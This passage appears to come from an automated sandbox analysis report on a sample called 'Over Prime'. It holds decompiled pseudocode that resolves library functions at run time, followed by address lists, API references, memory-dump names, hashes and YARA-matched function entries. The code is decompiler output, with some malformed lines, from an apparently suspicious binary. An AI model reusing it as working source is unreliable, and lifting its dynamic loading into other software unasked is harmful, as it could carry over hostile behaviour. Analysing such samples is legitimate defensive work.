											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73B91B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73B91B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x73b9405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E73B91B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E73B916BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E73B913B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E73B916BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E73B913B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E73B913B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E73B913B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E73B912CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E73B913B1(_t90) * 4);
					goto L165;
				}
			}

0x73b91c07
0x73b91c0a
0x73b91c0d
0x73b91c10
0x73b91c13
0x73b91c16
0x73b91c19
0x73b91c1b
0x73b91c1e
0x73b91c21
0x73b91c26
0x73b91c29
0x73b91c31
0x73b91c39
0x73b91c3b
0x73b91c3e
0x73b91c46
0x73b91c46
0x73b91c4b
0x73b91c4e
0x00000000
0x00000000
0x73b91c5b
0x73b91c60
0x73b91c62
0x73b91cf4
0x73b91cf4
0x73b91cf4
0x73b91cf8
0x73b91cfb
0x73b91cfd
0x73b91d1f
0x73b91d21
0x73b91d24
0x73b91d33
0x73b91d35
0x73b91d3b
0x73b91d3b
0x73b91d41
0x73b91d44
0x73b91d44
0x73b91d47
0x73b91d47
0x73b91d4d
0x73b91d4f
0x73b91d4f
0x73b91d51
0x73b91d54
0x73b91d57
0x73b91d5d
0x73b91d63
0x73b91d66
0x73b91d8a
0x73b91d8d
0x00000000
0x00000000
0x73b91d90
0x73b91d92
0x73b91da0
0x73b91da3
0x73b91da5
0x00000000
0x00000000
0x00000000
0x00000000
0x73b91da7
0x73b91da7
0x73b91da7
0x73b91dad
0x73b91daf
0x00000000
0x00000000
0x73b91db1
0x73b91db3
0x73b91db5
0x73b91db7
0x00000000
0x00000000
0x00000000
0x73b91db7
0x73b91db9
0x73b91dbb
0x73b91dbd
0x73b91dbd
0x73b91dc3
0x73b91dc9
0x73b91dcb
0x73b91ddf
0x73b91ddf
0x73b91de1
0x73b91dcd
0x73b91dd3
0x73b91dd6
0x73b91dd6
0x00000000
0x73b91d68
0x73b91d68
0x73b91d68
0x73b91d69
0x73b91d71
0x73b91d75
0x73b91d7b
0x73b91d7f
0x00000000
0x73b91d7f
0x73b91d6b
0x73b91d6b
0x73b91d6c
0x00000000
0x00000000
0x73b91d6e
0x73b91d6f
0x00000000
0x00000000
0x00000000
0x73b91d6f
0x73b91cff
0x73b91d00
0x73b91d09
0x73b91d0c
0x73b91d19
0x73b91d19
0x73b91d0e
0x73b91d0e
0x73b91de7
0x73b91dea
0x73b91dee
0x73b91e61
0x73b91e65
0x73b91c43
0x00000000
0x73b91c43
0x00000000
0x73b91e65
0x73b91cfd
0x73b91c68
0x73b91c6b
0x73b91cce
0x73b91cd1
0x73b91ce3
0x73b91ce3
0x73b91ce6
0x73b91df3
0x73b91df6
0x73b91df6
0x73b91df8
0x73b921ae
0x73b921c6
0x73b921c6
0x73b921c9
0x00000000
0x00000000
0x73b921b3
0x73b921b4
0x73b921b7
0x73b921ba
0x73b92244
0x73b9224b
0x73b92251
0x73b92255
0x73b91e5c
0x73b91e5d
0x73b91e5d
0x73b91e5e
0x00000000
0x73b91e5e
0x73b921c0
0x73b921c3
0x73b921c3
0x73b921cb
0x73b921ce
0x73b92238
0x73b91e51
0x73b91e54
0x73b91e57
0x73b91e5a
0x73b91e5a
0x00000000
0x73b91e5a
0x73b921d0
0x73b921d3
0x73b921da
0x73b921da
0x73b921dd
0x73b921e1
0x73b921f5
0x73b921f5
0x73b921f8
0x73b921fc
0x00000000
0x00000000
0x73b921fe
0x73b92202
0x00000000
0x00000000
0x73b92204
0x73b9220b
0x73b9220b
0x73b92211
0x73b92214
0x73b92230
0x73b92216
0x73b9221f
0x73b92222
0x73b92222
0x00000000
0x73b92214
0x73b921e3
0x73b921e6
0x73b921ea
0x00000000
0x00000000
0x73b921ec
0x00000000
0x73b921ec
0x73b921d5
0x73b921d8
0x00000000
0x00000000
0x00000000
0x73b921d8
0x73b91dfe
0x73b91dfe
0x73b91dff
0x73b91f49
0x73b91f49
0x73b91f50
0x73b91f53
0x00000000
0x00000000
0x73b91f60
0x00000000
0x73b9214b
0x73b9214e
0x73b92151
0x73b92151
0x73b92152
0x73b92153
0x73b92156
0x73b92159
0x73b9215c
0x00000000
0x00000000
0x73b9215e
0x73b9215e
0x73b92162
0x73b9217a
0x73b9217d
0x73b92181
0x73b92187
0x00000000
0x73b92187
0x73b92164
0x73b92164
0x73b92167
0x00000000
0x00000000
0x73b92169
0x73b9216c
0x73b9216e
0x73b9216f
0x73b9216f
0x73b9216f
0x73b92170
0x73b92173
0x73b92176
0x73b92177
0x73b92151
0x73b92152
0x73b92153
0x73b92156
0x73b92159
0x73b9215c
0x00000000
0x00000000
0x00000000
0x73b9215c
0x00000000
0x73b91fa7
0x00000000
0x00000000
0x73b91fb3
0x00000000
0x00000000
0x73b91f9a
0x73b91f9e
0x73b91fa2
0x00000000
0x00000000
0x73b9211c
0x73b92120
0x00000000
0x00000000
0x73b92126
0x73b9212f
0x73b92136
0x73b9213e
0x00000000
0x00000000
0x73b92083
0x73b92083
0x00000000
0x00000000
0x73b91fbc
0x00000000
0x00000000
0x73b921a6
0x00000000
0x00000000
0x73b9208b
0x73b9208d
0x73b9208d
0x00000000
0x00000000
0x73b92196
0x00000000
0x00000000
0x73b9219a
0x00000000
0x00000000
0x73b921a2
0x00000000
0x00000000
0x73b920d3
0x73b920d5
0x73b920d5
0x00000000
0x00000000
0x73b9209d
0x73b9209f
0x73b9209f
0x00000000
0x00000000
0x73b920af
0x73b920b1
0x73b920b1
0x00000000
0x00000000
0x73b920e1
0x73b920e3
0x73b920e3
0x00000000
0x00000000
0x73b920ba
0x73b920bc
0x73b920bc
0x00000000
0x00000000
0x73b920c1
0x00000000
0x00000000
0x73b9219e
0x73b921a8
0x73b921a8
0x00000000
0x00000000
0x73b920ec
0x73b920f0
0x73b920f5
0x73b920f8
0x73b920f9
0x73b920fc
0x73b92102
0x73b92102
0x00000000
0x00000000
0x73b9218e
0x00000000
0x00000000
0x73b920c5
0x73b920c7
0x73b920c7
0x00000000
0x00000000
0x73b91fc3
0x73b91fc3
0x00000000
0x00000000
0x73b920da
0x73b920dc
0x73b920dc
0x00000000
0x00000000
0x73b91f67
0x73b91f6d
0x73b91f70
0x73b91f72
0x73b91f72
0x73b91f75
0x73b91f79
0x73b91f86
0x73b91f88
0x73b91f8e
0x73b91f8e
0x73b91f8e
0x00000000
0x00000000
0x73b9208e
0x73b9208e
0x73b92090
0x73b92097
0x00000000
0x00000000
0x73b920d6
0x73b920d6
0x00000000
0x00000000
0x73b920a0
0x73b920a0
0x73b920a2
0x73b920a9
0x00000000
0x00000000
0x73b920b2
0x73b920b2
0x73b920b4
0x00000000
0x00000000
0x73b920e4
0x73b920e4
0x00000000
0x00000000
0x73b920bd
0x73b920bd
0x00000000
0x00000000
0x73b9210a
0x73b9210e
0x73b92113
0x73b92116
0x00000000
0x00000000
0x73b920c8
0x73b920c8
0x73b920cb
0x73b920cd
0x00000000
0x00000000
0x73b920dd
0x73b920dd
0x73b920e6
0x73b920e6
0x73b91fc5
0x73b91fc5
0x73b91fc8
0x73b91fcf
0x73b91fd1
0x73b91fd3
0x73b91fda
0x73b91fdd
0x73b91fe2
0x73b91fe4
0x73b91fe6
0x73b91fea
0x73b91ff0
0x73b91ff6
0x73b91ff6
0x73b91ff8
0x73b91ff8
0x73b91ff9
0x73b91ff9
0x73b91ffd
0x73b92003
0x73b92005
0x73b92009
0x73b9200e
0x73b9200e
0x73b92010
0x73b92010
0x73b92013
0x73b92016
0x73b9201f
0x73b92025
0x73b92028
0x73b92028
0x73b9202a
0x73b9202d
0x73b92033
0x73b92039
0x73b92039
0x73b9203b
0x00000000
0x00000000
0x73b92041
0x73b92041
0x73b92045
0x73b9204c
0x73b92070
0x73b92070
0x73b92074
0x73b92076
0x73b92079
0x73b92079
0x73b9207c
0x73b9207c
0x00000000
0x73b92074
0x73b92051
0x73b92054
0x73b92054
0x73b9205b
0x73b9205d
0x73b92060
0x73b92067
0x73b92068
0x73b9206e
0x73b9206e
0x00000000
0x73b9206e
0x73b92062
0x73b92065
0x00000000
0x00000000
0x00000000
0x73b92065
0x73b91ff2
0x73b91ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x73b91f60
0x73b91e05
0x73b91e05
0x73b91e06
0x73b91f46
0x00000000
0x73b91f46
0x73b91e0c
0x73b91e0d
0x00000000
0x00000000
0x73b91e13
0x73b91e16
0x73b91f0b
0x73b91f0b
0x73b91f0e
0x73b91f23
0x73b91f25
0x73b91f25
0x73b91f26
0x73b91f29
0x73b91f2c
0x73b91f38
0x73b91f38
0x73b91f38
0x73b91f2e
0x73b91f2e
0x73b91f2e
0x73b91f3e
0x00000000
0x73b91f3e
0x73b91f10
0x73b91f10
0x73b91f11
0x73b91f1f
0x00000000
0x73b91f1f
0x73b91f14
0x73b91f15
0x00000000
0x00000000
0x73b91f1b
0x00000000
0x73b91f1b
0x73b91e1c
0x73b91f07
0x00000000
0x73b91f07
0x73b91e22
0x73b91e22
0x73b91e25
0x73b91e4e
0x00000000
0x73b91e4e
0x73b91e27
0x73b91e27
0x73b91e2a
0x73b91e44
0x00000000
0x73b91e44
0x73b91e2c
0x73b91e2c
0x73b91e2f
0x73b91e3e
0x00000000
0x73b91e3e
0x73b91e32
0x73b91e33
0x00000000
0x00000000
0x73b91e35
0x00000000
0x73b91cec
0x73b91cec
0x73b91cef
0x00000000
0x73b91cef
0x73b91ce6
0x73b91cd3
0x73b91cd8
0x00000000
0x00000000
0x73b91cda
0x73b91cdd
0x00000000
0x00000000
0x00000000
0x73b91cdd
0x73b91c6d
0x73b91c70
0x73b91ca6
0x73b91ca9
0x00000000
0x73b91caf
0x73b91cb1
0x73b91cb5
0x73b91cbc
0x73b91cc3
0x73b91cc6
0x73b91cc9
0x00000000
0x73b91cc9
0x73b91ca9
0x73b91c72
0x73b91c73
0x73b91c8e
0x73b91c91
0x00000000
0x73b91c97
0x73b91c97
0x73b91c9e
0x73b91ca1
0x00000000
0x73b91ca1
0x73b91c91
0x73b91c78
0x00000000
0x73b91c7e
0x73b91c7e
0x73b91c85
0x00000000
0x73b91c85
0x73b91c78
0x73b91e74
0x73b91e79
0x73b91e7e
0x73b91e82
0x73b92355
0x73b9235b
0x73b91e94
0x73b91e96
0x73b91e97
0x73b9227e
0x73b9227e
0x73b92281
0x73b92284
0x73b922a1
0x73b922a7
0x73b922a9
0x73b922af
0x73b922c6
0x73b922c6
0x73b922c6
0x73b922d3
0x73b922d9
0x73b922dc
0x73b922e2
0x73b922e4
0x73b922e8
0x73b922ea
0x73b922f1
0x73b922f6
0x73b922f9
0x73b922fb
0x73b92300
0x73b92312
0x73b92312
0x73b92300
0x73b922f9
0x73b922e8
0x73b92318
0x73b9231b
0x73b92325
0x73b9232d
0x73b9233a
0x73b92340
0x73b92343
0x73b92273
0x73b92273
0x00000000
0x73b92273
0x73b92349
0x73b9234f
0x73b9234f
0x00000000
0x00000000
0x73b92351
0x73b92351
0x73b92351
0x73b92351
0x00000000
0x73b9231d
0x73b9231d
0x73b92323
0x00000000
0x00000000
0x00000000
0x73b92323
0x73b9231b
0x73b922b2
0x73b922b8
0x73b922ba
0x73b922c0
0x00000000
0x00000000
0x00000000
0x73b922c0
0x73b92286
0x73b9228d
0x73b92293
0x73b92299
0x00000000
0x73b92299
0x73b91e9d
0x73b91e9e
0x73b9225d
0x73b9225d
0x73b92263
0x73b92266
0x00000000
0x00000000
0x73b9226d
0x73b92272
0x00000000
0x73b92272
0x73b91ea5
0x00000000
0x00000000
0x73b91eab
0x73b91eab
0x73b91eb4
0x73b91eb9
0x73b91ebf
0x00000000
0x00000000
0x73b91ec5
0x73b91ed2
0x73b91ed8
0x73b91ee2
0x73b91ee8
0x73b91ef0
0x73b91f00
0x00000000
0x73b91f00

APIs

Part of subcall function 73B912BB: GlobalAlloc.KERNEL32(00000040,?,73B912DB,?,73B9137F,00000019,73B911CA,-000000A0), ref: 73B912C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73B91D2D
lstrcpyW.KERNEL32(00000008,?), ref: 73B91D75
lstrcpyW.KERNEL32(00000808,?), ref: 73B91D7F
GlobalFree.KERNEL32(00000000), ref: 73B91D92
GlobalFree.KERNEL32(?), ref: 73B91E74
GlobalFree.KERNEL32(?), ref: 73B91E79
GlobalFree.KERNEL32(?), ref: 73B91E7E
GlobalFree.KERNEL32(00000000), ref: 73B92068
lstrcpyW.KERNEL32(?,?), ref: 73B92222
GetModuleHandleW.KERNEL32(00000008), ref: 73B922A1
LoadLibraryW.KERNEL32(00000008), ref: 73B922B2
GetProcAddress.KERNEL32(?,?), ref: 73B9230C
lstrlenW.KERNEL32(00000808), ref: 73B92326

Memory Dump Source

Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 4047ab6c3abe671ee5b67d9d339f16e321df985e6ba2df8910783859e332b659
Instruction ID: a92a356092b9bde85957105de98ac881a29db2718b4b3d04da7eb2b1e95dad32
Opcode Fuzzy Hash: 4047ab6c3abe671ee5b67d9d339f16e321df985e6ba2df8910783859e332b659
Instruction Fuzzy Hash: AA229B71D0460EDFFB11CFA4C5807ADBBB5FF48305F25853AD1A6AA280E7709681DB58

Uniqueness

Uniqueness Score: -1.00%

Function 02C38112 Relevance: 5.1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

W-'_, xrefs: 02C38226
,, xrefs: 02C38188
f, xrefs: 02C381A8
`, xrefs: 02C382B8

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID: ,$W-'_$`$f
API String ID: 0-4162539091
Opcode ID: 205f45c05da56c9c13ca75771396ec983a4c0aec752090f0b54b44f02b2e74c3
Instruction ID: 3f8decbf8078c91697ddee162f40d723b3a6421a4a7b2764d61610719d6fa19d
Opcode Fuzzy Hash: 205f45c05da56c9c13ca75771396ec983a4c0aec752090f0b54b44f02b2e74c3
Instruction Fuzzy Hash: E33168716017488FFF354D2A8EA27DB33E76FD1391F66452ACC4A47190D73646468B02

Uniqueness

Uniqueness Score: -1.00%

Function 02C381B8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

W-'_, xrefs: 02C38226
,, xrefs: 02C38188
f, xrefs: 02C381A8
`, xrefs: 02C382B8

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID: ,$W-'_$`$f
API String ID: 0-4162539091
Opcode ID: 3f4375e5e886d39f3bba9972cbc019462da11f6054c2abeda1fe49ba572d83a3
Instruction ID: 1d6d8cd5e363af05c9ff7a0fbcf5713fda7e258ec2bf4022fb577aec4bc03b4e
Opcode Fuzzy Hash: 3f4375e5e886d39f3bba9972cbc019462da11f6054c2abeda1fe49ba572d83a3
Instruction Fuzzy Hash: E1316772642748CFFF394D2A8D667DB33E7AFD0351F66862ACC4A87280D77546468B02

Uniqueness

Uniqueness Score: -1.00%

Function 02C381C8 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

W-'_, xrefs: 02C38226
,, xrefs: 02C38188
f, xrefs: 02C381A8
`, xrefs: 02C382B8

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID: ,$W-'_$`$f
API String ID: 0-4162539091
Opcode ID: a596c84059125743ac42446c0170466ba8cf370eec4bc674263de5968be6a8c9
Instruction ID: 8bc16e6ab3e023fbe33c171ed398dcea1bb41030125c1a1952c3562b9cd39a33
Opcode Fuzzy Hash: a596c84059125743ac42446c0170466ba8cf370eec4bc674263de5968be6a8c9
Instruction Fuzzy Hash: 0E317771601748CFFF394D2A8D627DB33EBAFD0351F66862ACC4A87180D73546468A02

Uniqueness

Uniqueness Score: -1.00%

Function 02C381D0 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

W-'_, xrefs: 02C38226
,, xrefs: 02C38188
f, xrefs: 02C381A8
`, xrefs: 02C382B8

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID: ,$W-'_$`$f
API String ID: 0-4162539091
Opcode ID: 075aff8c247ae4a38a150e69961312fe90e49bcac739e58e99ae8c97eba006f1
Instruction ID: efa3d2f2ed23fa5bc7a48c96d4534be75b211c1daff5e83e9b0fca2b64a1b3f7
Opcode Fuzzy Hash: 075aff8c247ae4a38a150e69961312fe90e49bcac739e58e99ae8c97eba006f1
Instruction Fuzzy Hash: 9D315471601748CFFF394D2A8D627DB33E7AFD0351F66862ADC4A87190D73546468B02

Uniqueness

Uniqueness Score: -1.00%

Function 02C381D8 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

W-'_, xrefs: 02C38226
,, xrefs: 02C38188
f, xrefs: 02C381A8
`, xrefs: 02C382B8

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID: ,$W-'_$`$f
API String ID: 0-4162539091
Opcode ID: 42163c04adb2c0b8d210c4d16680172ba0a398e3bbbbefe494e24cb90a322f79
Instruction ID: cb96442c4cb29c241015defcbd506809c215a1b6e13e535dbc8349409d492044
Opcode Fuzzy Hash: 42163c04adb2c0b8d210c4d16680172ba0a398e3bbbbefe494e24cb90a322f79
Instruction Fuzzy Hash: AC316431701788CFFF394D2A8DA27DB33E7AFD0351F25862ACC4A87280D73546468A02

Uniqueness

Uniqueness Score: -1.00%

Function 02C30322 Relevance: 3.1, Strings: 2, Instructions: 624COMMON

Download Yara Rule

Strings

89)), xrefs: 02C30323
, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID: $89))
API String ID: 0-2600346759
Opcode ID: eb9e86c55cedd718c4c44b3965eb2d6520260e0b8eac55d489740c95b97f6972
Instruction ID: 18b3b5ba1830ce4685f9c03a8d0c36dfca9353322e3469ffc190382ab90cf175
Opcode Fuzzy Hash: eb9e86c55cedd718c4c44b3965eb2d6520260e0b8eac55d489740c95b97f6972
Instruction Fuzzy Hash: 3DF1B983E3F31589E7D33072C2517E25780DF27596E128F5AD82AB29A1771F0E8E88D5

Uniqueness

Uniqueness Score: -1.00%

Function 02C300C4 Relevance: 2.0, Strings: 1, Instructions: 748COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 544c32d5b7b023345cf304afdd9093048294c8ca2389f7b4515cc31aff843632
Instruction ID: 03e1aa75f3bb166ceb3c61546af702828ce886d93cff3ce9af76d0e8169566e3
Opcode Fuzzy Hash: 544c32d5b7b023345cf304afdd9093048294c8ca2389f7b4515cc31aff843632
Instruction Fuzzy Hash: 6302C983E3F31589E7D33072C5517E26B81DF275D6E128F5AD82A729B1371B0A8E88C5

Uniqueness

Uniqueness Score: -1.00%

